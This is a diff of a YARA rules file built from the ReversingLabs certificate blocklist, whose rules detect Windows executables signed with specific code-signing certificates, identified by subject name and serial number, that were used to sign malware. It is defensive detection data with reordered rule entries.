-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Blist LLC" and pe.signatures [ i ] . serial == "2f:4a:25:d5:2b:16:eb:4c:9d:fe:71:eb:bd:81:21:bb" and 1629763200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Planeta, TOV" and ( pe.signatures [ i ] . serial == "00:b7:21:79:c0:27:b9:03:7e:e2:20:e8:1a:b1:8f:e5:6d" or pe.signatures [ i ] . serial == "b7:21:79:c0:27:b9:03:7e:e2:20:e8:1a:b1:8f:e5:6d" ) and 1603381300 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6889Aab6202Bcc5F11Caedf4D04F435B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_07B74C70C4Aa092648B7F0D1A8A3A28F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d4499a1d-aa8d-5056-ad91-439f27f00c33"
+		id = "f941b7d6-f168-57aa-881a-54679a2b948c"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12894-L12910"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6902-L6918"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b2261ed8001929be8f80f73cc0c5076138f4794c73cbffd63773da5fc44639a8"
+		logic_hash = "97759fa2e519936115f0493e251f9abc0cce3ada437776a5a370388512235491"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24269,21 +46663,21 @@ rule REVERSINGLABS_Cert_Blocklist_6889Aab6202Bcc5F11Caedf4D04F435B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "C4DL Media" and pe.signatures [ i ] . serial == "68:89:aa:b6:20:2b:cc:5f:11:ca:ed:f4:d0:4f:43:5b" and 1231891200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rad-Grad D.O.O." and pe.signatures [ i ] . serial == "07:b7:4c:70:c4:aa:09:26:48:b7:f0:d1:a8:a3:a2:8f" and 1603240965 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3Be63083Fbb1787B445Da97583721419 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4C8Def294478B7D59Ee95C61Fae3D965 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6839595d-b645-5963-bd96-a668bfdd667f"
+		id = "549249df-690c-5b75-ac1a-77b509c9e163"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12912-L12928"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6920-L6936"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f39f5a632544bc01c3b4c9e2f2dd33f7109c44375f54011a34181e10da79debc"
+		logic_hash = "3b7b10afa5f0212bd494ba8fe32bef18f2bbd77c8ab2ad498b9557a0575cc177"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24293,21 +46687,21 @@ rule REVERSINGLABS_Cert_Blocklist_3Be63083Fbb1787B445Da97583721419 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\"SMART GREY\" LLC" and pe.signatures [ i ] . serial == "3b:e6:30:83:fb:b1:78:7b:44:5d:a9:75:83:72:14:19" and 1493942400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DREAM SECURITY USA INC" and pe.signatures [ i ] . serial == "4c:8d:ef:29:44:78:b7:d5:9e:e9:5c:61:fa:e3:d9:65" and 1592961292 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6E2D3449272B6B96B8B9F728E87580D5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7D36Cbb64Bc9Add17Ba71737D3Ecceca : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6975acb9-3b37-51f5-8b4d-0d1a090a18e2"
+		id = "ce10840c-150d-5ecd-ab9a-7bc96092ebfd"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12930-L12946"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6938-L6954"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0155a8c71bf8426bbb980798772b04c145df5b8c4b60ff1a610a1236a47547ef"
+		logic_hash = "5874860582ed5be6908dca38e6ecae831eeeb0c2b768e8065ada9fd5ac2bda89"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24317,21 +46711,21 @@ rule REVERSINGLABS_Cert_Blocklist_6E2D3449272B6B96B8B9F728E87580D5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RADIANT, OOO" and pe.signatures [ i ] . serial == "6e:2d:34:49:27:2b:6b:96:b8:b9:f7:28:e8:75:80:d5" and 1421107200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LTD SERVICES LIMITED" and pe.signatures [ i ] . serial == "7d:36:cb:b6:4b:c9:ad:d1:7b:a7:17:37:d3:ec:ce:ca" and 1616025600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_268C0D7028A154Ac3B6349C5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ad255D4Ebefa751F3782587396C08629 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0e18d9ef-e861-5583-a2a3-5f54fae8d813"
+		id = "e42d2881-efda-5aa0-b455-dabbd3a77e97"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12948-L12964"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6956-L6974"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8311b36f008e31b7ac27b439fa46da4c90ab4be6c7c89426f8e1939963bc3d7d"
+		logic_hash = "43f44cbedf37094416628c9df23767be3b036519f93222812597777a146ecb24"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24341,21 +46735,21 @@ rule REVERSINGLABS_Cert_Blocklist_268C0D7028A154Ac3B6349C5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "26:8c:0d:70:28:a1:54:ac:3b:63:49:c5" and 1474266712 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Ornitek" and ( pe.signatures [ i ] . serial == "00:ad:25:5d:4e:be:fa:75:1f:37:82:58:73:96:c0:86:29" or pe.signatures [ i ] . serial == "ad:25:5d:4e:be:fa:75:1f:37:82:58:73:96:c0:86:29" ) and 1614643200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2Daa8D629Cc0410A9482E62A0F8Bf8Fc : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_262Ca7Ae19D688138E75932832B18F9D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "71e627d9-0892-5501-8189-26eae36b7965"
+		id = "7151fd62-7f6c-59d7-800b-65e5b4db279b"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12966-L12982"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6976-L6992"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "cfb2631bc1832f65fb9d77c812bf2a1e05121e825254bd57ae8b21e7b10b2344"
+		logic_hash = "a5bb946c6199cd47a087ac26f0a996261318d1830191ea7c0e7797ff03984558"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24365,21 +46759,21 @@ rule REVERSINGLABS_Cert_Blocklist_2Daa8D629Cc0410A9482E62A0F8Bf8Fc : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DON'T MISS A WORD LIMITED" and pe.signatures [ i ] . serial == "2d:aa:8d:62:9c:c0:41:0a:94:82:e6:2a:0f:8b:f8:fc" and 1543449600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bisoyetutu Ltd Ltd" and pe.signatures [ i ] . serial == "26:2c:a7:ae:19:d6:88:13:8e:75:93:28:32:b1:8f:9d" and 1616025600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_9A727E200Ea76570 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_59A57E8Ba3Dcf2B6F59981Fda14B03 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d133dac3-3959-50f0-913e-b279ca6a1c2c"
+		id = "12c80895-57fd-5341-b3ef-d59c25d4c234"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12984-L13002"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6994-L7010"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "337dc486f2bdca1f7682887d5e5c0f82961850a8fd9c9a20b9a43a75334070d8"
+		logic_hash = "6e77c7d0bd7e5e9bc8880cc6ffc3f5f4f738e3dde22c270ad7a6f6672a99de53"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24389,21 +46783,21 @@ rule REVERSINGLABS_Cert_Blocklist_9A727E200Ea76570 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Alexsandro Da Rosa - ME" and ( pe.signatures [ i ] . serial == "00:9a:72:7e:20:0e:a7:65:70" or pe.signatures [ i ] . serial == "9a:72:7e:20:0e:a7:65:70" ) and 1539056530 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Medium LLC" and pe.signatures [ i ] . serial == "59:a5:7e:8b:a3:dc:f2:b6:f5:99:81:fd:a1:4b:03" and 1609113600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0954A3C876Df9262Cde5817F9870F0C6 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Aebe117A13B8Bca21685Df48C74F584D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "89f3a334-cd2f-51b9-83b2-2baca3c59ba5"
+		id = "ec525737-9770-585e-922a-43f14e0a4a37"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13004-L13020"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7012-L7030"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "164b064a9df31d4a122236dfee7b713417a44d47a7f304b2bf55686a7f038feb"
+		logic_hash = "e7fbc1f32adec39c94dc046933e152cd6d3946da4a168306484b7b6bc7f26fb6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24413,21 +46807,21 @@ rule REVERSINGLABS_Cert_Blocklist_0954A3C876Df9262Cde5817F9870F0C6 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dialer Access" and pe.signatures [ i ] . serial == "09:54:a3:c8:76:df:92:62:cd:e5:81:7f:98:70:f0:c6" and 1160438400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NANAX d.o.o." and ( pe.signatures [ i ] . serial == "00:ae:be:11:7a:13:b8:bc:a2:16:85:df:48:c7:4f:58:4d" or pe.signatures [ i ] . serial == "ae:be:11:7a:13:b8:bc:a2:16:85:df:48:c7:4f:58:4d" ) and 1613520000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3C30930E53Bb026F9A5D7440155F7118 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7Dcd19A94535F034Ee36Af4676740633 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ad7d8be0-ecb1-508f-bfce-7a5cecfd4e2f"
+		id = "c09778b6-17c9-5b24-8977-1bd998083c23"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13022-L13038"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7032-L7048"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "260a58669043d21ee0ffccbdee95c9d04ef338497685d42f1951660f658a164d"
+		logic_hash = "7079d4f1973ad4de21e1f88282c94b11c4d63f8bad12b35ef76a481e154d9da3"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24437,21 +46831,21 @@ rule REVERSINGLABS_Cert_Blocklist_3C30930E53Bb026F9A5D7440155F7118 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CPM Media, Ltd." and pe.signatures [ i ] . serial == "3c:30:93:0e:53:bb:02:6f:9a:5d:74:40:15:5f:71:18" and 1064534400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Toko Saya ApS" and pe.signatures [ i ] . serial == "7d:cd:19:a9:45:35:f0:34:ee:36:af:46:76:74:06:33" and 1609200000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_432Eefc0D4Dc0326Eb277A518Cc4310A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ca4822E6905Aa4Fca9E28523F04F14A3 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "eeccb477-0bf7-5b79-94df-710e6e0db78f"
+		id = "004454a0-20f9-58f5-8c24-8097f7586c5b"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13040-L13056"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7050-L7068"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d5a0b7f19f66f18b5ef1c548276b675ead74fed6be94310c303bfad6c85f18be"
+		logic_hash = "9633f3494e9ece3a698d47c5ba2b7ee7f82cee4be36ac418c969c36285c4963c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24461,21 +46855,21 @@ rule REVERSINGLABS_Cert_Blocklist_432Eefc0D4Dc0326Eb277A518Cc4310A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "43:2e:ef:c0:d4:dc:03:26:eb:27:7a:51:8c:c4:31:0a" and 1466121600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ELISTREID, OOO" and ( pe.signatures [ i ] . serial == "00:ca:48:22:e6:90:5a:a4:fc:a9:e2:85:23:f0:4f:14:a3" or pe.signatures [ i ] . serial == "ca:48:22:e6:90:5a:a4:fc:a9:e2:85:23:f0:4f:14:a3" ) and 1614643200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_470D6Ce21A6940320261F09E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_24C1Ef800F275Ab2780280C595De3464 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "00b92b5d-59e3-5aae-954d-a90bd8cc1370"
+		id = "251212a5-95ce-5d9f-aec0-e6d3dd099349"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13058-L13074"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7070-L7086"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "cae1d381bf2018a0ce56feb245d01f2bfea55b67894264d32d78dbb41873c792"
+		logic_hash = "7536ec92f388234bea3b33bee4af52e0e0ce9cd86b1c8321a503f70bfe5faa76"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24485,21 +46879,21 @@ rule REVERSINGLABS_Cert_Blocklist_470D6Ce21A6940320261F09E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "47:0d:6c:e2:1a:69:40:32:02:61:f0:9e" and 1474523038 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HOLGAN LIMITED" and pe.signatures [ i ] . serial == "24:c1:ef:80:0f:27:5a:b2:78:02:80:c5:95:de:34:64" and 1614729600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7E6Bc7E5A49E2C28E6F5D042 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6401831B46588B9D872B02076C3A7B00 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a7b815d9-e247-5de1-9bcb-96294b3b91c0"
+		id = "61b67e68-9e15-5848-b12a-437a0ad8399e"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13076-L13092"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7088-L7104"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f378c490ff4f32fc095c822f75abac44a8d94327404cd97546c63e7441e07632"
+		logic_hash = "cb84b27391fa0260061bc5444039967e83f2134f7b56f9cccf6a421d4a65a577"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24509,21 +46903,21 @@ rule REVERSINGLABS_Cert_Blocklist_7E6Bc7E5A49E2C28E6F5D042 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shang Hai Jian Ji Wang Luo Ke Ji You Xian Gong Si" and pe.signatures [ i ] . serial == "7e:6b:c7:e5:a4:9e:2c:28:e6:f5:d0:42" and 1560995284 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ACTIV GROUP ApS" and pe.signatures [ i ] . serial == "64:01:83:1b:46:58:8b:9d:87:2b:02:07:6c:3a:7b:00" and 1615507200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4C5020899147C850196C4Ebf : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0A01A91Cce63Ede5Eaa3Dac4883Aea05 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8ac60604-6548-5f11-bf89-ec7e927b20f7"
+		id = "a1efbce8-3cca-5e07-a652-d67007c72a18"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13094-L13110"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7106-L7122"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "112e834a24c50d639f8607740faa609f1a36539058357544e5dbcddf841f3116"
+		logic_hash = "58a26b44e485814fa645bfa490f3442745884026bb7a70327d4f51645ad3f69c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24533,21 +46927,21 @@ rule REVERSINGLABS_Cert_Blocklist_4C5020899147C850196C4Ebf : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "4c:50:20:89:91:47:c8:50:19:6c:4e:bf" and 1476693792 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Seacloud Technologies Pte. Ltd." and pe.signatures [ i ] . serial == "0a:01:a9:1c:ce:63:ed:e5:ea:a3:da:c4:88:3a:ea:05" and 1618876800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4Efcf7Adc21F070E590D49Ddb8081397 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_54Cd7Ae1C27F1421136Ed25088F4979A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "df467418-9d57-5ad0-b396-2ef519a22989"
+		id = "76999ae0-966e-5c52-8e00-a3af8afd8fae"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13112-L13128"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7124-L7140"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d60a5bbd50484d620ab60cfd40840abc541c2b7bc1005a9076b69ddd1b938652"
+		logic_hash = "c7cd84a225216ff1464a147c2572de2b0a2f69f7a315cdebef5ad2bab843b72a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24557,21 +46951,21 @@ rule REVERSINGLABS_Cert_Blocklist_4Efcf7Adc21F070E590D49Ddb8081397 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ding Ruan" and pe.signatures [ i ] . serial == "4e:fc:f7:ad:c2:1f:07:0e:59:0d:49:dd:b8:08:13:97" and 1476921600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABBYMAJUTA LTD LIMITED" and pe.signatures [ i ] . serial == "54:cd:7a:e1:c2:7f:14:21:13:6e:d2:50:88:f4:97:9a" and 1616371200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Cbd37C0A651913Ee25A6860D7D5Ccdf2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_F2D693Aad63E6920782A0027Dfc97D91 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e56205d6-9f02-5a8a-8dd3-b8c323fba4bf"
+		id = "c4876bdd-35bc-5a3f-9f55-9a730e7ff5c8"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13130-L13148"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7142-L7160"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "77cc439aea6eaa5a835b6b1aa50904c1df0d5379228e424ab2d68a3cb654834c"
+		logic_hash = "8f29e65b39608518d16f708faef68db37b6e179c567819dccb6681adcec262e3"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
